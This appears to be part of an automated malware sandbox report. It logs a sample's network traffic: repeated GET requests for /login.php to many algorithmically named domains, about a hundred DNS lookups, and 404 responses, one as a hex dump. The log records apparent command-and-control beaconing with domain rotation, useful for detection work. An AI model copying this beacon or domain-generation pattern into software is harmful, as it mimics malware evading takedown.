Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344858|1731344858|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=910vr4788904590031611
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comCookie: snkz=66.23.206.109; btst=d26b1bc4b9544e9356db55f438dfb4a0|66.23.206.109|1731344858|1731344858|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344858|1731344858|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=dfd3f50e4dee78c8f9b2b106904110df|66.23.206.109|1731344858|1731344858|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344905|1731344858|23|2|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344905|1731344858|23|2|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344906|1731344858|24|2|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=910vr4788904590031611
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
Source: global trafficDNS traffic detected: DNS query: qedyfyq.com
Source: global trafficDNS traffic detected: DNS query: lymyxid.com
Source: global trafficDNS traffic detected: DNS query: puzywel.com
Source: global trafficDNS traffic detected: DNS query: volyqat.com
Source: global trafficDNS traffic detected: DNS query: gahyqah.com
Source: global trafficDNS traffic detected: DNS query: vocyruk.com
Source: global trafficDNS traffic detected: DNS query: puzylyp.com
Source: global trafficDNS traffic detected: DNS query: puvytuq.com
Source: global trafficDNS traffic detected: DNS query: qegyhig.com
Source: global trafficDNS traffic detected: DNS query: purycap.com
Source: global trafficDNS traffic detected: DNS query: qekykev.com
Source: global trafficDNS traffic detected: DNS query: gacyryw.com
Source: global trafficDNS traffic detected: DNS query: qedynul.com
Source: global trafficDNS traffic detected: DNS query: vonypom.com
Source: global trafficDNS traffic detected: DNS query: pupybul.com
Source: global trafficDNS traffic detected: DNS query: pumypog.com
Source: global trafficDNS traffic detected: DNS query: lysynur.com
Source: global trafficDNS traffic detected: DNS query: volykyc.com
Source: global trafficDNS traffic detected: DNS query: lykyjad.com
Source: global trafficDNS traffic detected: DNS query: qebytiq.com
Source: global trafficDNS traffic detected: DNS query: ganypih.com
Source: global trafficDNS traffic detected: DNS query: pujyjav.com
Source: global trafficDNS traffic detected: DNS query: lyvytuj.com
Source: global trafficDNS traffic detected: DNS query: vopybyt.com
Source: global trafficDNS traffic detected: DNS query: vojyjof.com
Source: global trafficDNS traffic detected: DNS query: lyryfyd.com
Source: global trafficDNS traffic detected: DNS query: qetyvep.com
Source: global trafficDNS traffic detected: DNS query: purydyv.com
Source: global trafficDNS traffic detected: DNS query: qegyqaq.com
Source: global trafficDNS traffic detected: DNS query: gacyzuz.com
Source: global trafficDNS traffic detected: DNS query: vowydef.com
Source: global trafficDNS traffic detected: DNS query: lygymoj.com
Source: global trafficDNS traffic detected: DNS query: qexylup.com
Source: global trafficDNS traffic detected: DNS query: vocyzit.com
Source: global trafficDNS traffic detected: DNS query: gaqydeb.com
Source: global trafficDNS traffic detected: DNS query: pufymoq.com
Source: global trafficDNS traffic detected: DNS query: lyxylux.com
Source: global trafficDNS traffic detected: DNS query: qeqysag.com
Source: global trafficDNS traffic detected: DNS query: vofymik.com
Source: global trafficDNS traffic detected: DNS query: gadyniw.com
Source: global trafficDNS traffic detected: DNS query: qeqyxov.com
Source: global trafficDNS traffic detected: DNS query: vofygum.com
Source: global trafficDNS traffic detected: DNS query: qetyfuv.com
Source: global trafficDNS traffic detected: DNS query: puvyxil.com
Source: global trafficDNS traffic detected: DNS query: lyxywer.com
Source: global trafficDNS traffic detected: DNS query: vonyzuf.com
Source: global trafficDNS traffic detected: DNS query: galyqaz.com
Source: global trafficDNS traffic detected: DNS query: lysyfyj.com
Source: global trafficDNS traffic detected: DNS query: lyvyxor.com
Source: global trafficDNS traffic detected: DNS query: galykes.com
Source: global trafficDNS traffic detected: DNS query: gatyfus.com
Source: global trafficDNS traffic detected: DNS query: vojyqem.com
Source: global trafficDNS traffic detected: DNS query: gatyvyz.com
Source: global trafficDNS traffic detected: DNS query: gaqycos.com
Source: global trafficDNS traffic detected: DNS query: lymysan.com
Source: global trafficDNS traffic detected: DNS query: qekyqop.com
Source: global trafficDNS traffic detected: DNS query: gadyfuh.com
Source: global trafficDNS traffic detected: DNS query: lyryvex.com
Source: global trafficDNS traffic detected: DNS query: gahyhob.com
Source: global trafficDNS traffic detected: DNS query: pumyxiv.com
Source: global trafficDNS traffic detected: DNS query: lygygin.com
Source: global trafficDNS traffic detected: DNS query: qexyryl.com
Source: global trafficDNS traffic detected: DNS query: vowycac.com
Source: global trafficDNS traffic detected: DNS query: pufygug.com
Source: global trafficDNS traffic detected: DNS query: pupydeq.com
Source: global trafficDNS traffic detected: DNS query: ganyzub.com
Source: global trafficDNS traffic detected: DNS query: lykymox.com
Source: global trafficDNS traffic detected: DNS query: vopydek.com
Source: global trafficDNS traffic detected: DNS query: qebylug.com
Source: global trafficDNS traffic detected: DNS query: pujymip.com
Source: global trafficDNS traffic detected: DNS query: gatydaw.com
Source: global trafficDNS traffic detected: DNS query: lyvylyn.com
Source: global trafficDNS traffic detected: DNS query: vojymic.com
Source: global trafficDNS traffic detected: DNS query: qetysal.com
Source: global trafficDNS traffic detected: DNS query: lyrysor.com
Source: global trafficDNS traffic detected: DNS query: gahynus.com
Source: global trafficDNS traffic detected: DNS query: vocykem.com
Source: global trafficDNS traffic detected: DNS query: puvylyg.com
Source: global trafficDNS traffic detected: DNS query: qegynuv.com
Source: global trafficDNS traffic detected: DNS query: qeqylyl.com
Source: global trafficDNS traffic detected: DNS query: gadydas.com
Source: global trafficDNS traffic detected: DNS query: puzymig.com
Source: global trafficDNS traffic detected: DNS query: pufybyv.com
Source: global trafficDNS traffic detected: DNS query: lyvywed.com
Source: global trafficDNS traffic detected: DNS query: vowypit.com
Source: global trafficDNS traffic detected: DNS query: gadyveb.com
Source: global trafficDNS traffic detected: DNS query: lyxyjaj.com
Source: global trafficDNS traffic detected: DNS query: gaqyzuw.com
Source: global trafficDNS traffic detected: DNS query: pufydep.com
Source: global trafficDNS traffic detected: DNS query: lymylyr.com
Source: global trafficDNS traffic detected: DNS query: gaqypiz.com
Source: global trafficDNS traffic detected: DNS query: qexykaq.com
Source: global trafficDNS traffic detected: DNS query: gacyqob.com
Source: global trafficDNS traffic detected: DNS query: puryxuq.com
Source: global trafficDNS traffic detected: DNS query: qegyfyp.com
Source: global trafficDNS traffic detected: DNS query: lyryxij.com
Source: global trafficDNS traffic detected: DNS query: vocyqaf.com
Source: global trafficDNS traffic detected: DNS query: pujygul.com
Source: global trafficDNS traffic detected: DNS query: lygyfex.com
Source: global trafficDNS traffic detected: DNS query: gahyfyz.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:07:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yxBl%2BU1di8myqSyomKhdTxMkueBNPufV9F2zXrBad3JyTyy2b9I1XPYwnytHR19sKAVouOjLtNSBAGHOzRwgTJvKJuW8iMW6a8Nj3wUvcPmDfs3EGmlxpZTsxBe4vg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0fe13cdf1f7ca8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1258&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2266040&cwnd=251&unsent_bytes=0&cid=5a5fdb9f7b7a9336&ts=814&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:07:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2B9GI8VCCOkAhQFFrFli4ZI4XfGUYlt7f%2FjhVyMUVB6t%2FiXruXl2W6Ecfgg0HbCWsOmjE7Fz0L9TXI7I75MHDoHdgjaDJoRbE0cd3IZeE74i6nnqlbAC%2F8NOe%2FdrlA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0fe146b96d43e2-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1150&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=881&delivery_rate=2503025&cwnd=251&unsent_bytes=0&cid=225e217fac765eba&ts=779&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:07:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="34.7",amp_style_sanitizer;dur="16.4",amp_tag_and_attribute_sanitizer;dur="13.0",amp_optimizer;dur="16.1"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y54P%2FbC6Czn91DdFrBkD9dlpnnSwTVe%2BQ%2BXI46GnlYb15puEDyVJ3Qyf7eFI%2F8sod16RbKHjaD5vzEvblvLpPiKkG4V762%2FB%2FaqdNQgm4PFjAb0M4J%2FO5%2BPIvEOTEg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0fe1599a3be014-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=155407&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=881&delivery_rate=18636&cwnd=32&unsent_bytes=0&cid=5a634b9774fd58d2&ts=1343&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:07:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="48.4",amp_style_sanitizer;dur="20.0",amp_tag_and_attribute_sanitizer;dur="22.4",amp_optimizer;dur="24.5"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5dIJnh%2FNAB49Q0h87DSz8i8v4u3vZRoD2hBl66julo9bS2MbsgPloCPrIv2sY%2B%2BT%2FPPI3KKkoTrLOC7iy6vbyhb6vQaWzY2Qq%2B4gtUGnvd7DN3oaqn3BkVw5XZsT1w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0fe1667ea542c1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1143&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=2439764&cwnd=251&unsent_bytes=0&cid=b3c5f4b20f6ea0cb&ts=1454&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:08:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6NixuP3VHlvY4a02QkX1H56AcLLYyzixeP91QbMAUYmbBYkmpVd9IO8pJOYEl74N4FoTtoX6by59j8%2BlD%2FFV%2B6XWnQtZLZM7bNpX2IhomPSPjiv2lwcwRKxcvQrUQw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0fe1c39d490fa9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1357&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2219157&cwnd=246&unsent_bytes=0&cid=ecfe42cacef3ed9e&ts=806&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:08:04 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u4GtruFWenSS9sqlJsjeNb2b%2FsUOT83N23rGBakcRCcgx7hQEDZ1N%2BhmKrUk5KQ9kDlUegl9pgq7iqlXgQC1DZe16XdvpuUI3%2BG4GIMZiOzs13%2B%2Fn6RogoG%2FGRucbw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0fe1cdec5643b9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1410&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2061209&cwnd=251&unsent_bytes=0&cid=4be37058d93a0ea8&ts=1860&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:08:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="42.0",amp_style_sanitizer;dur="15.7",amp_tag_and_attribute_sanitizer;dur="21.7",amp_optimizer;dur="20.5"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BauW%2FQbbM5BiqlPzrbbrAhzIqPbQ0ir5HYyIaRL8bdr0m0Iiyp8duU%2FxzzJw%2F6rZb0WhK8LCgyOKuG4gOJsV6Td3cbQnoNrqejCKFc6ONIlt1zT6wdXBGgWnotwgkQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0fe1dfa8aa43a3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1146&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=2481576&cwnd=250&unsent_bytes=0&cid=6af90ce2745ec6db&ts=1359&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:08:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="45.3",amp_style_sanitizer;dur="25.7",amp_tag_and_attribute_sanitizer;dur="15.3",amp_optimizer;dur="20.1"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bFlJdVDTs0wstH0wElrNFf996Nvc65TLCorfbc9WK%2FBRp0Bmvc%2BEmxIpw5h7XUOSIAxdmg%2FYPSJvsWHAHR7oRRttdqss%2B5EeLosMInX2PjW3lkcLWKesYpQ4JtAuHA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0fe1ed8a4c4245-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1319&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=1950168&cwnd=251&unsent_bytes=0&cid=2e518d260b9bfe55&ts=1422&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:07:33 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 